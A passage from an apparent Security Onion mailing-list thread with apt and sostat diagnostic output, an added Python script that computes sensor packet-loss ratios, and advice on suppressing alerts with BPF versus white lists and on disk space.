libgd3:amd64 (2.1.0-3ubuntu0.1, 2.1.0-3ubuntu0.2), grub2-common:amd64 (2.02~beta2-9ubuntu1.7, 2.02~beta2-9ubuntu1.11), securitySO-server-daq:amd64 (2.0.6-0ubuntu0securitySO-server2, 2.0.6-0ubuntu0securitySO-server5), libldap-2.4-2:amd64 (2.4.31-1+nmu2ubuntu8.2, 2.4.31-1+nmu2ubuntu8.3), libnss3-nssdb:amd64 (3.21-0ubuntu0.14.04.2, 3.23-0ubuntu0.14.04.1), gimp-data:amd64 (2.8.10-0ubuntu1, 2.8.10-0ubuntu1.1), securitySO-server-web-page:amd64 
(20141015-0ubuntu0securitySO-server57, 20141015-0ubuntu0securitySO-server60), xserver-xorg-core-lts-vivid:amd64 (1.17.1-0ubuntu3.1~trusty1, 1.17.1-0ubuntu3.1~trusty1.1), wget:amd64 (1.15-1ubuntu1.14.04.1, 1.15-1ubuntu1.14.04.2), libdpkg-perl:amd64 (1.17.5ubuntu5.6, 1.17.5ubuntu5.7), securitySO-server-snort:amd64 (X.X.X.X-1ubuntu1securitySO-server1, X.X.X.X-1ubuntu1securitySO-server1), securitySO-server-sostat:amd64 (20120722-0ubuntu0securitySO-server53, 20120722-0ubuntu0securitySO-server59), isc-dhcp-client:amd64 (4.2.4-7ubuntu12.4, 4.2.4-7ubuntu12.5), libnss3:amd64 (3.21-0ubuntu0.14.04.2, 3.23-0ubuntu0.14.04.1), libdrm-nouveau2:amd64 (2.4.64-1~ubuntu14.04.1, 2.4.67-1ubuntu0.14.04.1), libmysqlclient18:amd64 (5.5.49-0ubuntu0.14.04.1, 5.5.50-0ubuntu0.14.04.1), grub-pc-bin:amd64 (2.02~beta2-9ubuntu1.7, 2.02~beta2-9ubuntu1.11), apache2-data:amd64 (2.4.7-1ubuntu4.9, 2.4.7-1ubuntu4.13), grub-pc:amd64 (2.02~beta2-9ubuntu1.7, 2.02~beta2-9ubuntu1.11), sbsigntool:amd64 (0.6-0ubuntu7.1, 0.6-0ubuntu7.2), securitySO-server-pfring-daq:amd64 (20121107-0ubuntu0securitySO-server12, 20121107-0ubuntu0securitySO-server13), libcurl3:amd64 (7.35.0-1ubuntu2.6, 7.35.0-1ubuntu2.7), kpartx-boot:amd64 (0.4.9-3ubuntu7.12, 0.4.9-3ubuntu7.13), securitySO-server-setup:amd64 (20120912-0ubuntu0securitySO-server215, 20120912-0ubuntu0securitySO-server224), securitySO-server-pfring-userland:amd64 (20160204-1ubuntu1securitySO-server2, 20160708-1ubuntu1securitySO-server1), libexpat1:amd64 (2.1.0-4ubuntu1.2, 2.1.0-4ubuntu1.3), apache2:amd64 (2.4.7-1ubuntu4.9, 2.4.7-1ubuntu4.13), tzdata:amd64 (2016d-0ubuntu0.14.04, 2016f-0ubuntu0.14.04), apache2-bin:amd64 (2.4.7-1ubuntu4.9, 2.4.7-1ubuntu4.13), linux-libc-dev:amd64 (3.13.0-87.133, 3.13.0-92.139), libdrm2:amd64 (2.4.64-1~ubuntu14.04.1, 2.4.67-1ubuntu0.14.04.1), libxrandr2:amd64 (1.4.2-1, 1.5.0-1~trusty1), libcurl3-gnutls:amd64 (7.35.0-1ubuntu2.6, 7.35.0-1ubuntu2.7)
End-Date: 2016-08-01 16:47:18

Start-Date: 2016-08-14 03:33:26
Commandline: apt-get install open-vm-tools
Install: open-vm-tools:amd64 (9.4.0-1280544-5ubuntu6.2), zerofree:amd64 (1.0.2-1ubuntu1, automatic)
End-Date: 2016-08-14 03:33:56

=========================================================================
ELSA
=========================================================================
Syslog-ng
Checking for process:
1600 /usr/sbin/syslog-ng -p /var/run/syslog-ng.pid
Checking for connection:
Connection to localhost 514 port [tcp/shell] succeeded!

MySQL
Checking for process:
1606 /usr/sbin/mysqld
Checking for connection:
Connection to localhost 3306 port [tcp/mysql] succeeded!

Sphinx
Checking for process:
1513 su -s /bin/sh -c exec "$0" "$@" sphinxsearch -- /usr/bin/searchd --nodetach
1598 /usr/bin/searchd --nodetach
Checking for connection:
Connection to localhost 9306 port [tcp/*] succeeded!

ELSA Buffers in Queue:
3
If this number is consistently higher than 20, please see:
https://github.com/Security-Onion-Solutions/security-SO-server/wiki/FAQ#why-does-sostat-show-a-high-number-of-elsa-buffers-in-queue

ELSA Directory Sizes:
438M /nsm/elsa/data
2.3M /var/lib/mysql/syslog
32K /var/lib/mysql/syslog_data

ELSA Index Date Range
If you don't have at least 2 full days of logs in the Index Date Range,
then you'll need to increase log_size_limit in /etc/elsa_node.conf.
MIN(start) MAX(end)
2016-08-14 03:21:41 2016-08-14 18:40:52

robbie@onion:~$ cd /etc/nsm/rules
robbie@onion:/etc/nsm/rules$ ls
app-layer-events.rules bro downloaded.rules local.rules smtp-events.rules tls-events.rules
backup classification.config files.rules modbus-events.rules so_rules.rules white_list.rules
black_list.rules decoder-events.rules gen-msg.map reference.config stream-events.rules
bpf.conf dns-events.rules http-events.rules sid-msg.map threshold.conf
robbie@onion:/etc/nsm/rules$
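
The headline number hidden in the Packet Loss Stats above is the drop fraction per consumer: pf_ring reports cumulative "Tot Packets"/"Tot Pkt Lost" per application, and netsniff-ng appends a "Processed: +N Lost: -M" pair per interval, so the per-line values have to be summed before they mean anything. The script below is an added example, not code from this thread or from the Security Onion project; its sample input is a handful of lines copied from the sostat output above (the real run has hundreds of netsniff-ng lines), and the 5% warning threshold is an assumption. It computes lost/(seen+lost), the share of packets offered to each consumer that it never saw. Snort's own pkt_drop_percent quoted by sostat is a per-interval perfmon figure, so it will not match the cumulative pf_ring ratio.

```python
import re
import sys

# Constructed sample: a few lines copied from the sostat "Packet Loss Stats"
# section of this thread. A real run has hundreds of netsniff-ng lines.
SAMPLE = """
pf_ring:

Appl. Name : bro-eth1
Tot Packets : 34675530
Tot Pkt Lost : 62159


Appl. Name : snort-cluster-52-socket-0
Tot Packets : 34525973
Tot Pkt Lost : 21603700

Netsniff-NG:
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +281087 Lost: -84828
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +153675 Lost: -52729
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +154609 Lost: -29468
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +141898 Lost: -67497
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +149275 Lost: -50137
"""

# One pf_ring block = three consecutive lines: app name, packets seen, packets lost.
PFRING_RE = re.compile(
    r"Appl\. Name\s*:\s*(\S+)\s+Tot Packets\s*:\s*(\d+)\s+Tot Pkt Lost\s*:\s*(\d+)"
)
# netsniff-ng logs one "+processed -lost" pair per interval; the signs are literal.
NETSNIFF_RE = re.compile(r"Processed:\s*\+(\d+)\s+Lost:\s*-(\d+)")


def parse_pfring(text):
    """Return {app_name: (packets_seen, packets_lost)} for each pf_ring consumer."""
    return {name: (int(seen), int(lost)) for name, seen, lost in PFRING_RE.findall(text)}


def parse_netsniff(text):
    """Sum every per-interval Processed/Lost pair into cumulative (processed, lost)."""
    processed = lost = 0
    for p, l in NETSNIFF_RE.findall(text):
        processed += int(p)
        lost += int(l)
    return processed, lost


def loss_fraction(seen, lost):
    """Share of packets offered to the consumer that it never got to see."""
    total = seen + lost
    return lost / total if total else 0.0


def summarize(text, warn_at=0.05):
    """Per-consumer loss fractions plus the sorted names of those at or over warn_at.

    warn_at is an assumed threshold, not a Security Onion default.
    """
    report = {app: loss_fraction(seen, lost) for app, (seen, lost) in parse_pfring(text).items()}
    processed, lost = parse_netsniff(text)
    report["netsniff-ng"] = loss_fraction(processed, lost)
    return report, sorted(app for app, frac in report.items() if frac >= warn_at)


if __name__ == "__main__":
    # Pipe real output in (sudo sostat | python3 loss.py) or run with no stdin for the sample.
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE
    report, over = summarize(text)
    for app, frac in report.items():
        print(f"{app:32s} {frac:6.1%}")
    print("over threshold:", ", ".join(over) or "none")
```

On the sample this flags both the Snort pf_ring cluster (roughly 38% of packets never delivered) and netsniff-ng (roughly 24%), while Bro is under 1%; the NIC itself shows "dropped:0", so the packets are being lost between the ring and the consumers, which is the pattern of a sensor short on CPU rather than one with a broken capture path.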


Wes

Aug 14, 2016, 3:14:27 PM
to security-onion
Robbie,

Specifically, what application is crashing? Your RAM seems to be okay from your sostat -- are you referring to disk space?

Also, have you seen the following (in regard to managing alerts)?

https://github.com/Security-Onion-Solutions/security-onion/wiki/ManagingAlerts

You can add specific IPs or ranges to HOME_NET (or other variables) in /etc/nsm/HOSTNAME-INTERFACE/snort.conf if you do not wish for Snort to alert on them.

You could also look at BPF if you would like to completely exclude certain traffic from being collected:

https://github.com/Security-Onion-Solutions/security-onion/wiki/BPF

Last, you could create an Autocat rule in Sguil to assist with auto-categorizing various alerts.

https://github.com/Security-Onion-Solutions/security-onion/wiki/ManagingAlerts#autocategorize-events

I would be careful to not let the uncategorized Sguil events get too high, as this could potentially lead to poor performance and/or DB table corruption for securityonion_db (Sguil DB).

Hope this helps.

Thanks,
Wes

Robbie Foster

Aug 16, 2016, 12:43:35 AM
to security-onion
It is running out of storage very rapidly. I blew the VM out this morning and rebuilt it with 6 cores, 400 GB HD, 15 GB RAM, 1 day archive, 2 Snort engines. Only 1 Snort engine appears to be working; the second looks to be dropping 50% of packets currently. I whitelisted the IPs that are causing all of the events in /etc/nsm/rules/white_list.rules but that still doesn't suppress them. The problem is once it gets going I can hardly get into Sguil, ELSA, Squert because it is so busy with all the damn alerts. I did manage to get into Sguil long enough to autocat them. I am just trying to get it operational enough at this point to try and learn it, but I am spending all of my time just keeping it running and not making any progress. I suppose I could tell it what IPs to monitor instead of the whole 192.168.1/24. I would prefer to tell it which ones not to monitor though.

Wes

Aug 16, 2016, 7:26:52 AM
to security-onion
Have you considered telling it what traffic (not alerts) to cut out by using BPF for the time being, then pruning back once you get other alerting mechanisms better tuned?

https://github.com/Security-Onion-Solutions/security-onion/wiki/BPF

Also, if you are performing full packet capture and monitoring a lot of traffic, you may run out of space very quickly. I would consider attaching a larger drive for /nsm if this is the case; otherwise, you could try disabling FPC for now.

https://github.com/Security-Onion-Solutions/security-onion/wiki/Hardware#storage
https://github.com/Security-Onion-Solutions/security-onion/wiki/NewDisk

Thanks,
Wes

Robbie Foster

Aug 17, 2016, 7:54:20 PM
to security-onion
I used BPF and all of the undesired events stopped. Is there any benefit or detrimental effect of using BPF over white_list, or is one as good a solution as the next? I am not getting any activity now, which is what I would expect to see since I am the only one who has access to the VM box. I am going to let it run overnight before I start thinking about paring back the resources allocated to it now.
Thanks for the help with this!

Wes

Aug 17, 2016, 8:14:42 PM
to security-onion
On Wednesday, August 17, 2016 at 7:54:20 PM UTC-4, Robbie Foster wrote:
> I used BPF and all of the undesired events stopped. Is there any benefit or detrimental effect of using BPF over white_list, or is one as good a solution as the next? I am not getting any activity now, which is what I would expect to see since I am the only one who has access to the VM box. I am going to let it run overnight before I start thinking about paring back the resources allocated to it now.
> Thanks for the help with this!

I would imagine the use of BPF would only be "detrimental" if you needed to be able to see any of the traffic you were ignoring. If the intention is to ignore all traffic from a specific range or from certain hosts to other hosts and you have no need to see any of the traffic in any manner, then BPF should be fine.

Even so, BPF has the capability to do a decent amount of filtering on its own. While not comparable to the added depth provided by Snort/Suricata's mechanisms, it seems they are meant for achieving different goals.

Thanks,
Wes
